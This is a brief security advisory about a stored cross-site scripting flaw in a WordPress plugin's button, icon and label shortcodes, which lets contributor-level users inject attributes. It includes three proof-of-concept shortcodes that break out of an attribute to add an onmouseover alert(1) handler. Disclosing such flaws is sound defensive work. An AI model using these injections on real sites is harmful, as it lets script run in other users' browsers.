The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Insert any of the following shortcodes in a page/post: *Button shortcode [lana_button size=“md” type=‘" onmouseover=“alert(1)” style=“background:red;”’]Lana Button[/lana_button] *Icon shortcode [lana_icon name=‘home" onmouseover=“alert(1)” style=“background:red;”’] *Label shortcode [lana_label type=‘" onmouseover=“alert(1)” style=“background:red;”’]New[/lana_label]